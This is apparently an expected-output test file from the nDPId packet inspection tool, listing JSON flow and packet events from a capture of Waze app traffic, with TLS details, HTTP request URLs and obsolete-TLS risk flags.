+00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871918,"flow_last_seen":1435587872045,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872045,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871929,"flow_last_seen":1435587872139,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872139,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871935,"flow_last_seen":1435587872205,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872205,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871939,"flow_last_seen":1435587872289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872289,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871941,"flow_last_seen":1435587872340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587872340,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871941,"flow_last_seen":1435587872341,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587872341,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587872476,"flow_last_seen":1435587872476,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587872476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1435587872476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587872476,"pkt":"ABoRAAACABoRAAABCABFAAA8WSJAAEAGvP4KCAABNubjrLHwAFDxQTSmAAAAAKAC\/\/\/drgAAAgQFtAQCCAoACG2EAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1435587872477,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872477,"pkt":"ABoRAAACABoRAAABCABFAAAodLxAABAG0Xg25uOsCggAAQBQsfAOvstZ8UE0p1AS\/\/\/Y9QAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1435587872478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872478,"pkt":"ABoRAAACABoRAAABCABFAAAoWSNAAEAGvREKCAABNubjrLHwAFDxQTSnDr7LWlAQ\/\/\/Y9gAA"} 
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":175,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
+01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871935,"flow_last_seen":1435587872515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872515,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871918,"flow_last_seen":1435587872568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871939,"flow_last_seen":1435587872569,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587872569,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587872702,"flow_last_seen":1435587872702,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587872702,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1435587872702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587872702,"pkt":"ABoRAAACABoRAAABCABFAAA8Y6lAAEAGsncKCAABNubjrLHyAFAC8Q4\/AAAAAKAC\/\/\/yUgAAAgQFtAQCCAoACG2WAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1435587872704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872704,"pkt":"ABoRAAACABoRAAABCABFAAAodMpAABAG0Wo25uOsCggAAQBQsfL9DvHAAvEOQFAS\/\/\/Y8wAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1435587872705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872705,"pkt":"ABoRAAACABoRAAABCABFAAAoY6pAAEAGsooKCAABNubjrLHyAFAC8Q5A\/Q7xwVAQ\/\/\/Y9AAA"} 
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
+01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":247,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871929,"flow_last_seen":1435587873486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587873486,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01242{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":249,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871935,"flow_last_seen":1435587873688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873688,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} +01242{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871929,"flow_last_seen":1435587873741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873741,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} 
+01243{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587871918,"flow_last_seen":1435587874033,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1435587874033,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587878215,"flow_last_seen":1435587878215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587878215,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1435587878215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587878215,"pkt":"ABoRAAACABoRAAABCABFAAA8EZdAAEAGeDAKCAABNBFy25htAbtopH5VAAAAAKAC\/\/+mHQAAAgQFtAQCCAoACG\/CAAAAAAEDAwg="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1435587878217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878217,"pkt":"ABoRAAACABoRAAABCABFAAAodRhAABAGRMM0EXLbCggAAQG7mG2XW4GqaKR+VlAS\/\/9ktAAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1435587878217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878217,"pkt":"ABoRAAACABoRAAABCABFAAAoEZhAAEAGeEMKCAABNBFy25htAbtopH5Wl1uBq1AQ\/\/9ktQAA"} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878215,"flow_last_seen":1435587878444,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878444,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587878606,"flow_last_seen":1435587878606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587878606,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1435587878606,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587878606,"pkt":"ABoRAAACABoRAAABCABFAAA8DkFAAEAGt5sKCAABsCK6tI3YAbvsnGGoAAAAAKAC\/\/+FVQAAAgQFtAQCCAoACG\/pAAAAAAEDAwg="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1435587878608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878608,"pkt":"ABoRAAACABoRAAABCABFAAAodR5AABAGgNKwIrq0CggAAQG7jdgTY55X7JxhqVAS\/\/+rXgAA"} 
+00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1435587878609,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878609,"pkt":"ABoRAAACABoRAAABCABFAAAoDkJAAEAGt64KCAABsCK6tI3YAbvsnGGpE2OeWFAQ\/\/+rXwAA"} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878215,"flow_last_seen":1435587878781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587878781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} 
